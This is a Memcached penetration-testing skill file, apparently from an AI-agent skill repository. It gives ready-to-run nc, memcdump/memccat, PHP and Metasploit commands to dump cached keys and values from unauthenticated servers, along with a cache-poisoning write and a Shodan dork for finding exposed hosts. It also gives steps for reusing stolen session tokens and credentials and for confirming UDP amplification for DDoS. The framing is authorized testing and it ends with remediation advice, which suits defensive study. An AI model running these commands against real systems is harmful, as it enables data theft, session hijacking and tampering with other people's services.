pentesting-memcached

Name: pentesting-memcached
Author: xalgord/xalgorix

$npx mdskill add xalgord/xalgorix/pentesting-memcached

- Default port `11211` on **both TCP and UDP**; Memcached is a plain-text line protocol, so `nc` works directly. - `nmap`/banner shows `11211/tcp open` and `version`/`stats` respond. - Use whenever 11211 is reachable — Memcached supports SASL but **most instances are exposed with no authentication**. Remember it is a cache, so keys appear and disappear.

SKILL.md

.github/skills/pentesting-memcachedView on GitHub ↗

---
name: pentesting-memcached
description: Testing Memcached distributed memory caching servers (default port 11211 TCP/UDP) for unauthenticated stats/version access, slab-based key dumping and cached-data exfiltration, cache poisoning, and the UDP reflection/amplification DDoS primitive during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- database
- memcached
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting Memcached (port 11211)

## When to Use
- Default port `11211` on **both TCP and UDP**; Memcached is a plain-text line protocol, so `nc` works directly.
- `nmap`/banner shows `11211/tcp open` and `version`/`stats` respond.
- Use whenever 11211 is reachable — Memcached supports SASL but **most instances are exposed with no authentication**. Remember it is a cache, so keys appear and disappear.

## Quick Enumeration
```bash
echo "version" | nc -vn -w 1 <IP> 11211      # version
echo "stats"   | nc -vn -w 1 <IP> 11211      # server stats (pid, uptime, curr_items)
echo "stats slabs" | nc -vn -w 1 <IP> 11211  # slab classes holding data
echo "stats items" | nc -vn -w 1 <IP> 11211  # item counts per slab

nmap -n -sV --script memcached-info -p11211 <IP>
msfconsole -q -x 'use auxiliary/gather/memcached_extractor; set RHOSTS <IP>; run; exit'
```

## Critical: Checks Most Often Missed
- **Unauthenticated stats/version access** — the #1 miss. Most instances answer `stats`/`version` with no auth, confirming exposure.
  - How to CONFIRM: `echo "stats" | nc -w1 <IP> 11211` returns `STAT pid ...`. Shodan dork: `port:11211 "STAT pid"`.
- **Key dumping → cached-data exfiltration** — enumerate slabs, list key names, then `get` them. Cached data routinely includes session tokens, SQL query results, and credentials.
  - How to CONFIRM (≤ 1.4.30): `echo "stats items" | nc -w1 <IP> 11211` then `echo "stats cachedump <slab> 0" | nc -w1 <IP> 11211` (the `0` = unlimited) lists `ITEM <key>`, then `echo "get <key>" | nc -w1 <IP> 11211` returns the value.
  - How to CONFIRM (≥ 1.4.31): `echo 'lru_crawler metadump all' | nc <IP> 11211` dumps key metadata (non-blocking, production-safe).
- **UDP reflection / amplification DDoS** — UDP 11211 with a tiny `stats`/`get` request yields a huge response, abused for spoofed-source amplification (the Memcrashed attacks).
  - How to CONFIRM: `nmap -sU -p11211 <IP>` shows UDP open; Metasploit `scanner/memcached/memcached_amp` reports amplification possible. Recommend disabling UDP (`-U 0`).
- **Cache poisoning** — write access (`set`/`add`) lets you tamper with cached application data (e.g. inject content, flip auth decisions cached in Memcached).
  - How to CONFIRM: `printf 'set evil 0 60 3\r\nabc\r\n' | nc -w1 <IP> 11211` returns `STORED`.

## Workflow

### Step 1: Enumerate
```bash
echo "version" | nc -vn -w 1 <IP> 11211
echo "stats"   | nc -vn -w 1 <IP> 11211       # note curr_items, total_items
echo "stats slabs" | nc -vn -w 1 <IP> 11211
echo "stats items" | nc -vn -w 1 <IP> 11211
nmap -sU -sV -p11211 <IP>                      # check UDP exposure
```

### Step 2: Authenticate (usually none; SASL if present)
```bash
# Most servers are unauthenticated. If SASL is enabled you need valid creds:
#   the binary protocol SASL handshake is required (libmemcached / mcrouter clients).
# Verify whether auth is required by attempting plain stats; a clean response = no auth.
echo "stats" | nc -w1 <IP> 11211
```

### Step 3: Exploit / Extract (dump keys + cached data)
```bash
# libmemcached-tools fast path
sudo apt install libmemcached-tools
memcstat --servers=<IP>                        # stats
memcdump --servers=<IP>                        # ALL key names
memccat  --servers=<IP> <key1> <key2>          # values for keys

# Manual slab dump (memcached <= 1.4.30)
echo "stats items" | nc -w1 <IP> 11211         # find slab class numbers
echo "stats cachedump 1 0" | nc -w1 <IP> 11211 # ITEM <key> ... per slab (0 = unlimited)
echo "get <key>" | nc -w1 <IP> 11211           # retrieve the value

# Production-safe dump (memcached >= 1.4.31)
echo 'lru_crawler metadump all' | nc <IP> 11211 | head

# PHP one-liner to enumerate keys
php -r '$c=new Memcached(); $c->addServer("<IP>",11211); var_dump($c->getAllKeys());'
```
```bash
# Cache poisoning (write test)
printf 'set app_flag 0 3600 1\r\n1\r\n' | nc -w1 <IP> 11211   # STORED
```

### Step 4: Post-access / impact / pivot
- Carve dumped values for session IDs, JWTs, API keys, cached DB rows, and credentials — reuse against the backing app/database.
- Note constraints: only **1MB per slab class** can be dumped this way, and the feature is unofficial; `peep` can dump everything but **freezes the memcached process** — avoid in production.
- Hijack sessions by reading/forging cached session tokens; poison cached auth/feature flags for privilege effects.
- If UDP is open, document the amplification DDoS exposure (high reflection factor) as a network-impact finding.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **Slab / slab class** | Memory grouped by chunk size; keys are dumped per slab class. |
| **stats cachedump** | Legacy command listing key names per slab (≤ 1MB, deprecated). |
| **lru_crawler metadump** | Non-blocking key-metadata dump for memcached ≥ 1.4.31. |
| **No auth default** | SASL is supported but rarely enabled; most servers accept plain commands. |
| **UDP amplification** | Spoofed UDP requests on 11211 yield large responses for reflection DDoS. |
| **Cache volatility** | Data is transient; keys appear/disappear as items are evicted. |
| **1MB / page limit** | Default max object size and per-slab dump page constrain extraction. |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nc / telnet** | Raw text-protocol interaction: `version`, `stats`, `cachedump`, `get`, `set`. |
| **libmemcached-tools** | `memcstat`, `memcdump` (all keys), `memccat` (values). |
| **nmap NSE** | `memcached-info` for unauthenticated info gathering. |
| **Metasploit** | `gather/memcached_extractor` (dump data), `scanner/memcached/memcached_amp` (UDP amplification check). |
| **php-memcached / perl memdump** | Scriptable key enumeration and value dumping. |
| **peep** | Workaround the 1MB limit to dump ALL keys — freezes the process (lab use only). |

## Common Scenarios
### Scenario 1: Unauth dump → session hijack
`echo stats | nc <IP> 11211` works with no auth. `memcdump` lists keys and `memccat` reveals cached session objects; the tester replays a valid session token to access the app as another user.

### Scenario 2: Cached credential exposure
An app caches SQL query results in Memcached. Dumping keys exposes rows containing usernames and password hashes, which are cracked and reused against SSH and the web login.

### Scenario 3: UDP amplification exposure
`nmap -sU -p11211` shows UDP open and `memcached_amp` confirms a large reflection factor. The exposure is reported as a reflection/amplification DDoS risk with a recommendation to disable UDP.

## Output Format
```
## Memcached Finding

**Service**: Memcached
**Port**: 11211/tcp+udp (memcached 1.4.25)
**Severity**: High
**Finding**: Unauthenticated Memcached exposing cached data and UDP amplification
**Evidence**:
  - `echo stats | nc <IP> 11211` -> STAT pid ... (no auth)
  - memcdump --servers=<IP> -> session:* keys; memccat revealed valid session tokens
  - nmap -sU -p11211 + memcached_amp -> amplification possible
**Impact**: Unauthenticated theft of cached secrets/session tokens and use of the server for reflection DDoS.
**Recommendation**:
  1. Bind to localhost / private interface and restrict 11211 by firewall.
  2. Disable UDP (`-U 0`) to eliminate amplification; enable SASL authentication.
  3. Avoid caching plaintext secrets/session material; encrypt sensitive cached values.
  4. Run memcached as an unprivileged user and keep it off untrusted networks.
```

More from xalgord/xalgorix

Skill	Description
abusing-hop-by-hop-headers	Testing proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostart	Enumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discovery	API endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigations	Methodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protections	Identifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sip	Assessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shells	Escaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otp	Identifying and exploiting flaws in two-factor authentication and one-time password verification
deep	Exhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rce	Testing machine-learning model files and model-loading services for remote code execution caused by insecure